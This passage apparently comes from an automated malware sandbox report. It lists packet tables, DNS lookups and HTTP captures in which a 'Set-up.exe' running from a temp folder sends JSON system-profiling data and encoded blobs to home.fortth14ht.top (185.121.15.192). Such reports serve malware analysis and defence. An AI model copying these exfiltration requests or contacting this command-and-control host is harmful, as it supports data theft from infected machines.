Dec 27, 2024 15:07:53.546770096 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.546957016 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.546974897 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.546984911 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547000885 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547034979 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547065973 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547153950 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547177076 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547277927 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547348022 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547357082 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547471046 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547481060 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547488928 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547554016 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547564030 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547657013 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547674894 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547722101 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547732115 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547775030 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547821999 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.547897100 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548031092 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548041105 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548048973 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548082113 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548129082 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548197031 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548213959 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548326969 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548355103 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548475027 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548563004 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548707008 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548716068 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548866987 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548877001 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.548974037 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549017906 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549160957 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549170971 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549356937 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549365997 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549405098 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549429893 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549556017 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549578905 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549693108 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.549781084 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.550451994 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.550561905 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.552191019 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.552221060 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.552330017 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.552392006 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.552402020 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.552612066 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.552644968 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.552789927 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.552856922 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553005934 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553016901 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553131104 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553160906 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553378105 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553389072 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553508043 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553517103 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553637981 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553730011 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553761959 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553802013 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553894043 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.553934097 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554055929 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554073095 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554183960 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554227114 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554326057 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554372072 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554475069 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554507017 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554646969 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554673910 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554761887 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554809093 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.554934978 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555052042 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555059910 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555068016 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555181980 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555191040 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555310011 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555367947 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555454016 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555526018 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555649996 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555671930 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555860043 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555869102 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555983067 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.555991888 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.556127071 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.556153059 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.556169033 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.556301117 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:53.670387983 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670414925 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670433044 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670442104 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670499086 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670516014 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670588017 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670604944 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670773983 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670783043 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670860052 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670869112 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670934916 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.670943975 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671008110 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671031952 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671169996 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671180010 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671243906 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671252966 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671320915 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671341896 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671396017 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671405077 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671482086 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671531916 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671581030 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671621084 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671763897 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671773911 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671884060 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.671938896 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672063112 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672071934 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672080040 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672087908 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672177076 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672225952 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672380924 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672389984 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672399044 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672408104 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672523975 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672533035 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672652006 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672662020 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672770023 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672780037 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672786951 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672796965 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672805071 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672842979 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672974110 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.672982931 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.675916910 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.675926924 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.676040888 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.676048994 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.676089048 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:53.676100969 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:55.897209883 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:55.897257090 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:55.897344112 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:55.897551060 CET	49732	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:56.017299891 CET	80	49732	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:56.046291113 CET	49736	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:56.165852070 CET	80	49736	185.121.15.192	192.168.2.4
Dec 27, 2024 15:07:56.170118093 CET	49736	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:56.170367956 CET	49736	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:07:56.289911985 CET	80	49736	185.121.15.192	192.168.2.4
Dec 27, 2024 15:08:02.701571941 CET	80	49736	185.121.15.192	192.168.2.4
Dec 27, 2024 15:08:02.701606989 CET	80	49736	185.121.15.192	192.168.2.4
Dec 27, 2024 15:08:02.701689005 CET	49736	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:08:02.702025890 CET	49736	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:08:02.821521044 CET	80	49736	185.121.15.192	192.168.2.4
Dec 27, 2024 15:08:02.847167969 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:08:02.967045069 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 15:08:02.967201948 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:08:02.967519045 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:08:03.087109089 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 15:08:04.286046028 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 15:08:04.286071062 CET	80	49739	185.121.15.192	192.168.2.4
Dec 27, 2024 15:08:04.286175013 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:08:04.286351919 CET	49739	80	192.168.2.4	185.121.15.192
Dec 27, 2024 15:08:04.406064034 CET	80	49739	185.121.15.192	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 15:07:36.870065928 CET	51656	53	192.168.2.4	1.1.1.1
Dec 27, 2024 15:07:36.870155096 CET	51656	53	192.168.2.4	1.1.1.1
Dec 27, 2024 15:07:37.009445906 CET	53	51656	1.1.1.1	192.168.2.4
Dec 27, 2024 15:07:37.176095963 CET	53	51656	1.1.1.1	192.168.2.4
Dec 27, 2024 15:07:51.603151083 CET	55112	53	192.168.2.4	1.1.1.1
Dec 27, 2024 15:07:51.603151083 CET	55112	53	192.168.2.4	1.1.1.1
Dec 27, 2024 15:07:51.902637959 CET	53	55112	1.1.1.1	192.168.2.4
Dec 27, 2024 15:07:51.908206940 CET	53	55112	1.1.1.1	192.168.2.4
Dec 27, 2024 15:07:55.906862020 CET	54568	53	192.168.2.4	1.1.1.1
Dec 27, 2024 15:07:55.906894922 CET	54568	53	192.168.2.4	1.1.1.1
Dec 27, 2024 15:07:56.045274019 CET	53	54568	1.1.1.1	192.168.2.4
Dec 27, 2024 15:07:56.045417070 CET	53	54568	1.1.1.1	192.168.2.4
Dec 27, 2024 15:08:02.708352089 CET	54570	53	192.168.2.4	1.1.1.1
Dec 27, 2024 15:08:02.708518028 CET	54570	53	192.168.2.4	1.1.1.1
Dec 27, 2024 15:08:02.846124887 CET	53	54570	1.1.1.1	192.168.2.4
Dec 27, 2024 15:08:02.846179962 CET	53	54570	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 15:07:36.870065928 CET	192.168.2.4	1.1.1.1	0x88a1	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:07:36.870155096 CET	192.168.2.4	1.1.1.1	0xe12f	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 27, 2024 15:07:51.603151083 CET	192.168.2.4	1.1.1.1	0xd77f	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:07:51.603151083 CET	192.168.2.4	1.1.1.1	0x5439	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 15:07:55.906862020 CET	192.168.2.4	1.1.1.1	0x196	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:07:55.906894922 CET	192.168.2.4	1.1.1.1	0x6e27	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 15:08:02.708352089 CET	192.168.2.4	1.1.1.1	0x8597	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:08:02.708518028 CET	192.168.2.4	1.1.1.1	0x6384	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 15:07:37.176095963 CET	1.1.1.1	192.168.2.4	0x88a1	No error (0)	httpbin.org	3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:07:37.176095963 CET	1.1.1.1	192.168.2.4	0x88a1	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:07:51.902637959 CET	1.1.1.1	192.168.2.4	0xd77f	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:07:56.045274019 CET	1.1.1.1	192.168.2.4	0x196	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:08:02.846124887 CET	1.1.1.1	192.168.2.4	0x8597	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	185.121.15.192	80	7532	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 15:07:52.049308062 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 531547 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 33 37 30 36 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317137067", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 27, 2024 15:07:52.170610905 CET	6180	OUT	Data Raw: 62 57 59 5a 35 2b 70 5c 2f 2b 75 61 6a 66 37 70 5c 2f 44 2b 59 72 6f 4f 55 68 6f 71 58 61 66 37 78 5c 2f 7a 2b 4e 50 6f 41 69 32 48 32 5c 2f 7a 2b 46 47 77 2b 33 2b 66 77 72 39 67 76 45 6e 5c 2f 42 4a 33 56 66 44 46 34 49 4c 37 34 30 2b 5a 5a 7a Data Ascii: bWYZ5+p\/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9gvEn\/BJ3VfDF4IL740+ZZzOVs9Sh+Gpa1uRyQjZ8ffuLoKCZLWRi67WaNpodkz0rX\/AIJZLc4z8d\/LJ7f8Kw3f+9DXPOPev4PxH7TP6EWEr1MNifGqdCvTdp06nhn4vxkuqavwBaUZL3ozi3GUWpRbi03\/AGvD9nX9MapTjVp+D8Z05K6lHx
Dec 27, 2024 15:07:52.170663118 CET	3708	OUT	Data Raw: 34 72 76 42 62 4a 48 4a 4d 6c 67 74 72 72 45 57 71 58 45 53 53 79 51 52 73 31 74 42 70 39 76 4b 38 5a 6e 45 73 79 44 62 62 52 79 53 6a 59 5c 2f 6e 50 69 6a 34 33 66 74 49 79 36 74 38 51 66 32 67 5c 2f 68 64 34 5c 2f 30 33 58 76 67 4a 59 7a 57 6c Data Ascii: 4rvBbJHJMlgtrrEWqXESSyQRs1tBp9vK8ZnEsyDbbRySjY\/nPij43ftIy6t8Qf2g\/hd4\/03XvgJYzWltp\/h7U\/D0JXT7+3u9C02TwzqGhyxS61pl7Ba6ifEF\/4gt9XtdP1O0mVkurW7ubbR7P+AOOvD\/Ns08VOOI5bi8Lk9N5rhatHHY6ri8Hg8dmed4fLsZhsqhicLh68HjcU8dKpRo4hRpT9jUu1yScf9VPC7xH4fy
Dec 27, 2024 15:07:52.170775890 CET	2472	OUT	Data Raw: 65 46 76 32 55 68 5c 2f 35 67 50 56 32 5c 2f 70 58 38 39 48 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 76 39 44 5c 2f 41 4b 48 65 46 70 5a 66 77 46 78 7a 6c 75 48 64 52 34 58 4c 66 46 6e 69 6a 41 59 53 4e 53 63 71 6b 71 65 47 77 32 55 38 4e 51 70 77 35 Data Ascii: eFv2Uh\/5gPV2\/pX89Hl+\/wCn\/wBev9D\/AKHeFpZfwFxzluHdR4XLfFnijAYSNScqkqeGw2U8NQpw5n5XnKySlUnOo1zTbf8Alb9O\/FVMw8TfD\/M68aaxWZ+DPCWYYydOnGnGrisTnnFsqlTlj5csI3bcacIQT5YRSjoqTy\/f9P8A69R1\/Wh\/FHtPL8f+AR+X7\/p\/9eo6sUUGhXqOTt+NXKr0AV6KsU2Tn5+mP6f
Dec 27, 2024 15:07:52.170942068 CET	4944	OUT	Data Raw: 57 72 51 30 70 39 66 6c 2b 6f 65 57 37 53 50 38 41 4c 76 38 41 4c 7a 4c 6e 31 5c 2f 58 46 56 76 6e 6b 5c 2f 64 75 6e 6c 76 38 41 38 73 76 4c 5c 2f 6c 2b 6e 58 46 58 47 5c 2f 77 42 58 76 32 62 6f 66 4e 5c 2f 64 48 79 76 63 66 35 37 5c 2f 41 4f 45 Data Ascii: WrQ0p9fl+oeW7SP8ALv8ALzLn1\/XFVvnk\/dunlv8A8svL\/l+nXFXG\/wBXv2bofN\/dHyvcf57\/AOEPl+Zsm+55n+rj\/wBR\/o\/1zzjtQb878v6+ZWk+aT7+x\/8AY\/5bZx6dv6\/Shti702f6yLH7z\/yb\/H\/PpT\/L\/dw\/uPk95f3H2j9fp\/UUxY90e+H5P3o\/1n+o\/wD1fnW3tfOX9fM1pfZ+f6jPvfudk
Dec 27, 2024 15:07:52.171142101 CET	2472	OUT	Data Raw: 66 69 56 6f 66 78 55 2b 4b 6e 6a 44 34 76 36 44 34 67 30 44 77 4e 70 6e 77 5c 2f 73 37 50 34 66 2b 49 50 42 6d 6c 36 50 4a 6f 32 6c 61 5c 2f 77 43 4a 76 45 56 76 63 33 4e 76 34 69 38 41 65 4b 37 35 39 54 65 2b 38 56 36 6a 46 4e 4e 46 71 45 4e 71 Data Ascii: fiVofxU+KnjD4v6D4g0DwNpnw\/s7P4f+IPBml6PJo2la\/wCJvEVvc3Nv4i8AeK759Te+8V6jFNNFqENq1rDZIllHLHPPcfwr4zcZcKcCfSe4T4h4zp1KuSUPCvBx5aWB\/tCcMwp8V8R4zLK8cP8Az4bHYWjiqVVNSoV6FKrD34xa\/wBNPo08HcV8e\/RO4z4e4LqQpZ3iPGPMXzVcb\/Z8JZfPg3hHCZnRlidf3eKwOLrYW
Dec 27, 2024 15:07:52.171236992 CET	2472	OUT	Data Raw: 75 2b 6e 2b 66 70 6d 6f 57 2b 54 37 69 46 6e 5c 2f 36 61 64 76 72 5c 2f 41 4a 48 54 46 58 5c 2f 33 6b 65 7a 65 64 6a 2b 56 36 5c 2f 35 5c 2f 7a 69 6f 5a 49 55 32 76 38 6d 5c 2f 6a 5c 2f 56 2b 64 2b 5a 5c 2f 44 74 78 36 56 50 4f 5c 2f 4c 2b 76 6d Data Ascii: u+n+fpmoW+T7iFn\/6advr\/AJHTFX\/3kezedj+V6\/5\/zioZIU2v8m\/j\/V+d+Z\/Dtx6VPO\/L+vmdhT+Rtn8Y\/n\/X\/J691k\/vb4\/3ko82T\/OKdnG9f+eX\/wBamY\/du+7e\/m\/p\/L\/H61qa868\/6+Yw8rvSaNP+WPl\/4f1\/pTG3+Z\/feP8A55\/5\/HvU2Mb8P\/27+Vnyf5e\/+TTJPLXZ\/rPM7xx
